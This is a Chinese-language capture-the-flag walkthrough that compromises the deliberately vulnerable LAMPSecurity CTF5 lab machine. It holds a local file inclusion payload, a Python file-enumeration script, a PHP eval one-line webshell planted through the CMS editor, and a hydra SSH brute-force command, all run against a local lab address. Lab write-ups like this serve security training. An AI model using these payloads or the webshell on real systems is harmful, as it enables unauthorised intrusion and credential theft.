Hack the LAMPSecurity: CTF 5 (CTF Challenge)
你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5的CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初学者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
下载完之后就开始我们今天的挑战啦~~
实战演练
环境说明
kali IP:192.168.35.128
主机发现
首先使用netdiscover命令查找靶机的IP。
netdiscover -i eth0 -r 192.168.35.0/24
发现靶机的主机为:192.168.35.148
信息收集
发现靶机IP之后,直接nmap来一波信息收集
nmap -O -sV -T4 -p 0-65535 192.168.35.148
发现靶机开启80端口和22端口,
先访问一下网站,然后用nikto扫描一下网站
nikto -host http://192.168.35.148 -port 80
--------------------------------------------------------------------------- + Target IP: 192.168.35.148 + Target Hostname: 192.168.35.148 + Target Port: 80 + Start Time: 2020-12-04 20:23:12 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.2.6 (Fedora) + Retrieved x-powered-by header: PHP/5.2.4 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + /index.php: PHP include error may indicate local or remote file inclusion is possible. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Tue Aug 21 10:59:12 2029 + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + Cookie SQMSESSID created without the httponly flag + OSVDB-3093: /mail/src/read_body.php: SquirrelMail found + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found + /info.php: Output from the phpinfo() function was found. + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/ + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 8724 requests: 0 error(s) and 26 item(s) reported on remote host + End Time: 2020-12-04 20:23:57 (GMT8) (45 seconds)
尝试攻击
如我们所见,该靶机很容易受到LFI / RFI漏洞的攻击。
现在,我们将如下所示在URL中粘贴此恶意代码,使用浏览器利用LFI漏洞
http://192.168.35.148/index.php?page=../../../../etc/passwd%00
发现确实存在文件包含的漏洞,并且顺利的读出来/etc/passwd的文件。
这里我们查看源代码,看起来会舒服一些。
发现存在五个用户,patrick,jennifer,andy,loren和amy
等会儿这几个用户可能会有用滴。
既然存在包含漏洞,那么直接可以写个python小脚本就可以对系统的文件进行快速枚举了哈。
import requests
URL = "http://192.168.35.148/index.php?page=../../../../../../NAME%00"
fd = open("test.txt")
while True:
word = fd.readline()
if not word:
break
word = word.strip()
r = requests.get(URL.replace("NAME", word))
if not "failed to open stream" in r.content:
print "jiuzhe", word
fd.close()
显然,首先需要使用有趣的文件路径(例如,用户的.ssh / id_rsa)填写test.txt文件。
得到以下输出:
不过兴趣不大:我们设法访问.bashrc,但不能访问SSH密钥。Apache日志也无法访问。
可能文件包含漏洞不能继续搞下去了,我们就得找找其他的突破口了。
在网站处我们发现,Andy Carp’s Blog是由NanoCMS支持,NanoCMS是基于PHP的轻量级CMS,现已停产。因此,我们在网上搜索了与Nano CMS相关的可能漏洞,并能够从以下URL https://cxsecurity.com/issue/WLB-2009040041 获取详细信息
识别出的可能漏洞是“密码哈希信息泄露”,它允许不受限制地访问路径/data/pagesdata.txt
尝试直接把路径附加在URL后面访问
竟然直接搞出来了密码,虽然密码是加密的,但是解密一波就出来了
就这样愉快的拿到账号密码喽
账号:admin
密码:shannon
后台登陆
用上面的账号密码搁这里一登陆,
进入到了管理员后台,在新建界面中发现可以写东西
先写个小代码尝试
我们可以简单地通过/~andy/data/pages/pwned.php?cmd=ls启动命令。
这样就可以直接写入经典的一句话木马,
<?php
@eval($_POST['cmd']);
?>
蚁剑连接,拿下webshell
冲冲冲,
这里可以看到 linux内核的版本是2.6.23.1-42,可以搜索linux内核版本的提权漏洞进行提权。不过我这里没有利用内核版本进行提权。
另外,同时我们可以从上面找到的5个用户,利用九头蛇暴力破解ssh
顺利破解出amy用户的密码。
hydra -L user.txt -P rockyou.txt 192.168.35.148 ssh -vV -f
顺利登上amy这个用户
提权
找到mail的目录,发现除了自己的邮件,其他的都没有权限
在amy的邮件中发现这个
From apache@localhost.localdomain Wed Apr 29 13:00:34 2009
Return-Path: <apache@localhost.localdomain>
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
by localhost.localdomain (8.14.1/8.14.1) with ESMTP id n3TH0Yqh007374
for <amy@localhost.localdomain>; Wed, 29 Apr 2009 13:00:34 -0400
Received: (from apache@localhost)
by localhost.localdomain (8.14.1/8.14.1/Submit) id n3TH0Yv7007373;
Wed, 29 Apr 2009 13:00:34 -0400
Date: Wed, 29 Apr 2009 13:00:34 -0400
Message-Id: <200904291700.n3TH0Yv7007373@localhost.localdomain>
To: amy@localhost.localdomain
Subject: An administrator created an account for you at Phake Organization Event Manager
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8Bit
X-Mailer: Drupal
Errors-To: patrick@localhost.localdomain
Sender: patrick@localhost.localdomain
Reply-To: patrick@localhost.localdomain
From: patrick@localhost.localdomain
amy,
A site administrator at Phake Organization Event Manager has created an account for you. You may now log in to http://192.168.229.129/events/?q=user using the following username and password:
username: amy
password: temppass
You may also log in by clicking on this link or copying and pasting it in your browser:
http://192.168.229.129/events/?q=user/reset/5/1241024434/68f9e4a85f2fad39d3140101bcc3865a
This is a one-time login, so it can be used only once.
After logging in, you will be redirected to http://192.168.229.129/events/?q=user/5/edit so you can change your password.
-- Phake Organization Event Manager team
我们通过这个邮件发现Patrick是管理员。我们将详细搜索他的个人目录。
但是第一遍 找了一圈也没找到有价值的东西
后来才反应过来,是否存在隐藏文件,
果不其然,
在隐藏文件 .tomboy中发现481bca0d-7206-45dd-a459-a72ea1131329.note 记录
481bca0d-7206-45dd-a459-a72ea1131329.note
惊呆了,就这,root密码就出来了
就搞完了!